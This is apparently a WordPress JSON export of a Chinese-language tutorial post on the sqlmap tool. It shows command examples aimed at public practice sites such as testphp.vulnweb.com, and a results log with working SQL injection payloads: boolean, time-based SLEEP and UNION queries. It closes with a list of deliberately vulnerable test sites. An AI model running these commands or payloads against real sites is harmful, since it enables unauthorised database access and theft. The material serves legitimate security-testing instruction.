{"id":271,"date":"2019-10-21T20:58:26","date_gmt":"2019-10-21T12:58:26","guid":{"rendered":"http:\/\/note.systw.net\/note\/?p=271"},"modified":"2025-12-19T09:31:36","modified_gmt":"2025-12-19T01:31:36","slug":"sqlmap","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/271","title":{"rendered":"SQLMap basic"},"content":{"rendered":"\n

http:\/\/sqlmap.org
sqlmap\u662f\u4e00\u4e2a\u958b\u6e90\u7684\u6e17\u900f\u6e2c\u8a66\u5de5\u5177\uff0c\u53ef\u900f\u904esql injection\u7684\u624b\u6cd5\u505a\u81ea\u52d5\u5316\u6aa2\u6e2c\uff0c\u6aa2\u6e2c\u7bc4\u570d\u5305\u62ec\u53d6\u5f97\u8cc7\u6599\u5eab\u6578\u64da\u548c\u76f8\u95dc\u6b0a\u9650\uff0c\u700f\u89bd\u4f5c\u696d\u7cfb\u7d71\u6587\u4ef6\u8207\u57f7\u884c\u4f5c\u696d\u7cfb\u7d71\u547d\u4ee4\u7b49<\/p>\n\n\n\n

<\/p>\n\n\n\n

\u5e38\u898b\u53c3\u6578\u4ecb\u7d39
https:\/\/www.tr0y.wang\/2018\/03\/21\/sqlmap-guide<\/a>
https:\/\/xz.aliyun.com\/t\/3010<\/a>
<\/p>\n\n\n\n

\n\n\n\n

\u76ee\u6a19\u9078\u64c7<\/h2>\n\n\n\n

\u6307\u5b9a\u76ee\u6a19\u6aa2\u6e2c<\/p>\n\n\n\n

\u53c3\u6578
-u \u6216 –url \u6307\u5b9aurl\u6aa2\u6e2c
-p \u6307\u5b9a\u8981\u6e2c\u8a66\u7684\u53c3\u6578\uff0c\u4e0d\u6307\u5b9a\u5c31\u662f\u6240\u6709\u7684\u53c3\u6578\u90fd\u8a66<\/p>\n\n\n\n

\n\n\n\n

GET<\/h3>\n\n\n\n

\u5c0d\u6240\u6709get\u53c3\u6578\u505a\u6aa2\u6e2c<\/p>\n\n\n\n

sqlmap -u http:\/\/testphp.vulnweb.com\/artists.php?artist=1<\/code><\/p>\n\n\n\n

\u6307\u5b9a\u53c3\u6578a\u548cb\u6aa2\u6e2c<\/p>\n\n\n\n

sqlmap -u \"http:\/\/example.com\/?a=1&b=2&c=3\" -p \"a,b\"<\/code><\/p>\n\n\n\n

<\/p>\n\n\n\n

\n\n\n\n

POST<\/h3>\n\n\n\n

\u53c3\u6578 –data<\/p>\n\n\n\n

\u4f7f\u7528post data\u6e2c\u8a66<\/p>\n\n\n\n

sqlmap -u \"http:\/\/example.com\" --data \"a=1&b=2&c=3\" --method POST<\/code><\/p>\n\n\n\n

\u4f7f\u7528post  json\u6e2c\u8a66<\/p>\n\n\n\n

sqlmap -u \"http:\/\/example.com\" --data \"{\\\"a\\\":\\\"abc\\\",\\\"b\\\":2}\" --method POST<\/code><\/p>\n\n\n\n

<\/p>\n\n\n\n

\u53c3\u6578 \u2013form \u81ea\u52d5\u6aa2\u6e2cpost\u53ef\u7528\u7684form\u6b04\u4f4d<\/p>\n\n\n\n

sqlmap -u http:\/\/testphp.vulnweb.com\/artists.php --form<\/code><\/p>\n\n\n\n

\n\n\n\n

websocket<\/h3>\n\n\n\n

sqlmap -u ws:\/\/websocket.aaa.com:9091 --data'{\"id\": \"1234\"}'<\/code><\/p>\n\n\n\n

<\/p>\n\n\n\n

refer
https:\/\/0xdf.gitlab.io\/2023\/06\/10\/htb-soccer.html#sql-injection-over-websockets<\/a><\/p>\n\n\n\n

<\/p>\n\n\n\n

\n\n\n\n

\u8b80\u53d6request\u6a94<\/h3>\n\n\n\n

\u53c3\u6578 -r<\/p>\n\n\n\n

\u7bc4\u4f8b sqlmap -r request.txt<\/code><\/p>\n\n\n\n

\u8aaa\u660e\uff1a\u4f7f\u7528Sqlmap+burpsuite\u5c0dpost\u6ce8\u5165<\/p>\n\n\n\n

1.\u700f\u89bd\u5668\u958b\u555f\u76ee\u6a19\u5f8c\uff0c\u9019\u6642\u5019Burp\u6703\u6514\u622a\u5230\u4e86\u76f8\u95dc\u8acb\u6c42<\/p>\n\n\n\n

2.\u628a\u9019\u500brequest\u8907\u88fd\u4e26\u547d\u540d\u70barequest.txt\uff0c\u5167\u5bb9\u5927\u81f4\u5982\u4e0b <\/p>\n\n\n\n

POST \/test.php HTTP\/1.1\nHost: testphp.vulnweb.com\nUser-Agent: Mozilla\/4.0\n\nuname=1<\/code><\/pre>\n\n\n\n
3.\u57f7\u884csqlmap\u4e26\u4f7f\u7528\u4ee5\u4e0b\u6307\u4ee4\uff1asqlmap -r request.txt<\/code><\/p>\n\n\n\n
REFER
https:\/\/blog.csdn.net\/kuxing100\/article\/details\/8731973<\/a><\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n
\u6279\u91cf\u8b80\u53d6request\u6a94<\/h3>\n\n\n\n
\u53c3\u6578 -l <\/p>\n\n\n\n
\u6307\u5b9a\u4e00\u500b Burp \u6216 WebScarab \u7684\u4ee3\u7406\u65e5\u8a8c\u6587\u4ef6\uff0cSqlmap \u5c07\u5f9e\u65e5\u8a8c\u6a94\u6848\u4e2d\u89e3\u6790\u51fa\u53ef\u80fd\u7684\u653b\u64ca\u76ee\u6a19\uff0c\u4e26\u9010\u4e00\u5617\u8a66\u9032\u884c\u6ce8\u5165\u3002\u6b64\u53c3\u6578\u5f8c\u9762\u8ddf\u8457\u4e00\u500b\u8868\u793a\u65e5\u8a8c\u6a94\u6848\u7684\u8def\u5f91\u3002<\/p>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n
\u8b80\u53d6xml\u6a94<\/h3>\n\n\n\n
Sqlmap \u53ef\u4ee5\u76f4\u63a5\u89e3\u6790 xml \u683c\u5f0f\u7684\u7db2\u7ad9\u5730\u5716\uff0c\u5f9e\u4e2d\u63d0\u53d6\u653b\u64ca\u76ee\u6a19<\/p>\n\n\n\n
\u53c3\u6578 -x<\/p>\n\n\n\n
sqlmap -x http:\/\/example.com\/sitemap.xml<\/code><\/p>\n\n\n\n
\n\n\n\n
\u8b80url\u6e05\u55ae<\/h3>\n\n\n\n
\u53ef\u7528\u5c07\u591a\u500b URL \u4ee5\u4e00\u884c\u4e00\u500b\u7684\u683c\u5f0f\u5132\u5b58\u5728\u6587\u5b57\u6a94\u6848\u4e2d<\/p>\n\n\n\n
\u53c3\u6578 -m<\/p>\n\n\n\n
sqlmap -m url.txt<\/code><\/p>\n\n\n\n
 url.txt\u5167\u5bb9\u5927\u81f4\u5982\u4e0b<\/p>\n\n\n\n
example1.com\/vuln1.php?q=foobar\nexample2.com\/vuln2.asp?id=1\nexample3.com\/vuln3\/id\/1*123\nexample.com\/login.php POST username=admin&password=1234\nexample.com\/upload.php POST file=example.png&submit=true<\/code><\/pre>\n\n\n\n
\n\n\n\n
\u6e2c\u8a66\u8868\u55ae<\/h3>\n\n\n\n
\u6e2c\u8a66\u8868\u55ae\u8cc7\u6599\u662f\u5426\u6709\u8a3b\u5165\u9ede<\/p>\n\n\n\n
\u53c3\u6578 –forms  <\/p>\n\n\n\n
\u540c\u6642\u4f7f\u7528\u53c3\u6578–forms\u548c-u\uff0cSqlmap \u6703\u89e3\u6790u\u6307\u5b9a\u7684\u90a3\u500b URL\u50b3\u56de\u9801\u9762\u4e2d\u7684\u8868\u55ae\uff0c\u6e2c\u8a66\u8868\u55ae\u662f\u5426\u6709\u8a3b\u5165\u9ede\uff0c\u800c\u4e0d\u6703\u5c0d\u76ee\u6a19 URL \u9032\u884c\u6ce8\u5165\u6e2c\u8a66\u3002<\/p>\n\n\n\n
\n\n\n\n
\u4f7f\u7528crawl<\/h3>\n\n\n\n
\u5f9e\u76ee\u6a19URL\u958b\u59cb\u722c\u53d6\u76ee\u6a19\u7db2\u7ad9\u4e26\u6536\u96c6\u53ef\u80fd\u5b58\u5728\u6f0f\u6d1e\u7684URL\u3002\u4f7f\u7528\u6b64\u53c3\u6578\u9084\u9700\u8981\u8a2d\u5b9a\u722c\u53d6\u6df1\u5ea6\uff0c\u6df1\u5ea6\u662f\u76f8\u5c0d\u65bc\u958b\u59cb\u722c\u53d6\u7684\u76ee\u6a19 URL \u800c\u8a00\u7684\u3002\u53ea\u6709\u6240\u6709\u65b0\u9023\u7d50\u90fd\u88ab\u905e\u6b78\u5730\u8a2a\u554f\u904e\u5f8c\u624d\u7b97\u722c\u53d6\u7d50\u675f\u3002\u5efa\u8b70\u6b64\u53c3\u6578\u8207–delay\u914d\u5408\u4f7f\u7528\u3002<\/p>\n\n\n\n
\u53c3\u6578\uff1a–crawl<\/p>\n\n\n\n
sqlmap -u example.com --batch --crawl=3<\/code><\/p>\n\n\n\n
\u8f38\u51fa\u7d50\u679c\u5927\u81f4\u5982\u4e0b<\/p>\n\n\n\n
[02:20:53] [INFO] starting crawler\n[02:20:53] [INFO] searching for links with depth 1\n[02:20:53] [WARNING] running in a single-thread mode. This could take a while\n[02:20:53] [INFO] searching for links with depth 2\n[02:20:54] [INFO] heuristics detected web page charset 'ascii'\n[02:21:00] [INFO] 42\/56 links visited (75%)<\/code><\/pre>\n\n\n\n
\n\n\n\n
\u6aa2\u6e2c\u7d50\u679c<\/h2>\n\n\n\n
sqlmap\u8dd1\u5b8c\u5f8c\u7d50\u679c\u6703\u986f\u793a\u5728\u756b\u9762\u4e0a\uff0c\u5982\u4e0b<\/p>\n\n\n\n
[08:54:39] [INFO] testing connection to the target URL\nsqlmap resumed the following injection point(s) from stored session:\n---\nParameter: cat (GET)\n    Type: boolean-based blind\n...omit...\n[08:54:39] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '\/home\/kali\/.local\/share\/sqlmap\/output\/results-12192025_0854am.csv'\n[08:54:39] [WARNING] your sqlmap version is outdated<\/code><\/pre>\n\n\n\n
\u540c\u6642\u4e5f\u6703\u5132\u5b58\u5728\u65e5\u5fd7\u4e2d\uff0c\u4ee5\u4e0a\u9762\u7684\u4f8b\u5b50\u5c31\u662f\/home\/kali\/.local\/share\/sqlmap\/output\/<\/code><\/p>\n\n\n\n
<\/p>\n\n\n\n
\u5e38\u898b\u6a94\u6848\u6709\u4ee5\u4e0b\u5e7e\u7a2e\uff1a<\/p>\n\n\n\n
1.results-*.csv<\/h3>\n\n\n\n
home\/kali\/.local\/share\/sqlmap\/output\/results-*.csv <\/code><\/p>\n\n\n\n
\u63d0\u4f9b\u532f\u7e3d\u6578\u64da\uff0c\u5167\u5bb9\u5982\u4e0b<\/p>\n\n\n\n
Target URL,Place,Parameter,Technique(s),Note(s)\nhttp://testphp.vulnweb.com\/artists.php?artist=1,GET,artist,BTU,<\/code><\/pre>\n\n\n\n
2.domain\/target.txt<\/h3>\n\n\n\n
home\/kali\/.local\/share\/sqlmap\/output\/< domain >\/ target.txt  <\/code><\/p>\n\n\n\n
http:\/\/testphp.vulnweb.com\/artists.php?artist=1 (GET)  # \/usr\/bin\/sqlmap -u http:\/\/testphp.vulnweb.com\/artists.php?artist=1 --batch <\/code><\/pre>\n\n\n\n
3.domain\/log<\/h3>\n\n\n\n
home\/kali\/.local\/share\/sqlmap\/output\/< domain >\/ log<\/p>\n\n\n\n
\u6703\u8a18\u9304\u5404\u7a2e\u8a73\u7d30\u7684\u7d50\u679c<\/p>\n\n\n\n
sqlmap identified the following injection point(s) with a total of 56 HTTP(s) requests:\n---\nParameter: artist (GET)\n    Type: boolean-based blind\n    Title: AND boolean-based blind - WHERE or HAVING clause\n    Payload: artist=1 AND 4469=4469\n\n    Type: time-based blind\n    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n    Payload: artist=1 AND (SELECT 6311 FROM (SELECT(SLEEP(5)))DZNH)\n\n    Type: UNION query\n    Title: Generic UNION query (NULL) - 3 columns\n    Payload: artist=-3553 UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7671,0x56637273417949465365676d687042564b706c516e4e7443576c77616d5350714c4f4c6377637276,0x716a786271)-- -\n---\nweb server operating system: Linux Ubuntu\nweb application technology: PHP 5.6.40, Nginx 1.19.0\nback-end DBMS: MySQL >= 5.0.12\nsqlmap resumed the following injection point(s) from stored session:\n---\nParameter: artist (GET)\n    Type: boolean-based blind\n    Title: AND boolean-based blind - WHERE or HAVING clause\n    Payload: artist=1 AND 4469=4469\n\n    Type: time-based blind\n    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n    Payload: artist=1 AND (SELECT 6311 FROM (SELECT(SLEEP(5)))DZNH)\n\n    Type: UNION query\n    Title: Generic UNION query (NULL) - 3 columns\n    Payload: artist=-3553 UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7671,0x56637273417949465365676d687042564b706c516e4e7443576c77616d5350714c4f4c6377637276,0x716a786271)-- -\n---\nweb server operating system: Linux Ubuntu\nweb application technology: PHP 5.6.40, Nginx 1.19.0\nback-end DBMS: MySQL >= 5.0.12\navailable databases [2]:\n[*] acuart\n[*] information_schema\n...omit...<\/code><\/pre>\n\n\n\n
<\/p>\n\n\n\n
\n\n\n\n
<\/p>\n\n\n\n
\u7dda\u4e0a\u6e2c\u8a66\u5f31\u9ede\u7db2\u7ad9<\/h2>\n\n\n\n
HP Webinspect\u63d0\u4f9b\u4ee5\u4e0b<\/p>\n\n\n\n
    \n
  • http:\/\/zero.webappsecurity.com\/index.html<\/li>\n<\/ul>\n\n\n\n
    IBM\u63d0\u4f9b\u4ee5\u4e0b<\/p>\n\n\n\n
      \n
    • http:\/\/demo.testfire.net\/<\/li>\n<\/ul>\n\n\n\n
      Acunetix\u63d0\u4f9b\u4ee5\u4e0b<\/p>\n\n\n\n
        \n
      • http:\/\/testasp.vulnweb.com\/<\/li>\n\n\n\n
      • http:\/\/testphp.vulnweb.com\/<\/li>\n\n\n\n
      • http:\/\/testhtml5.vulnweb.com\/<\/li>\n\n\n\n
      • http:\/\/testaspnet.vulnweb.com\/<\/li>\n<\/ul>\n\n\n\n
        OWASP\u63d0\u4f9b\u4ee5\u4e0b<\/p>\n\n\n\n
          \n
        • https:\/\/juice-shop.herokuapp.com<\/li>\n<\/ul>\n\n\n\n
          refer
          https:\/\/ithelp.ithome.com.tw\/articles\/10202811
          https:\/\/xdeath.tw\/read.php?69
          https:\/\/dotblogs.com.tw\/a926\/2016\/01\/07\/094825
          https:\/\/www.freebuf.com\/sectool\/164608.html<\/p>\n","protected":false},"excerpt":{"rendered":"
          sqlmap\u662f\u4e00\u4e2a\u958b\u6e90\u7684\u6e17\u900f\u6e2c\u8a66\u5de5\u5177\uff0c\u53ef\u900f\u904esql injection\u7684\u624b\u6cd5\u505a\u81ea\u52d5\u5316\u6aa2\u6e2c\uff0c\u6aa2\u6e2c\u7bc4\u570d\u5305\u62ec\u53d6\u5f97\u8cc7\u6599\u5eab\u6578\u64da\u548c\u76f8\u95dc\u6b0a\u9650\uff0c\u700f\u89bd\u4f5c\u696d\u7cfb\u7d71\u6587\u4ef6\u8207\u57f7\u884c\u4f5c\u696d\u7cfb\u7d71\u547d\u4ee4\u7b49<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[369],"tags":[3],"class_list":["post-271","post","type-post","status-publish","format-standard","hentry","category-red-team","tag-tool"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/271","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=271"}],"version-history":[{"count":3,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/271\/revisions"}],"predecessor-version":[{"id":2920,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/271\/revisions\/2920"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=271"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=271"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=271"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}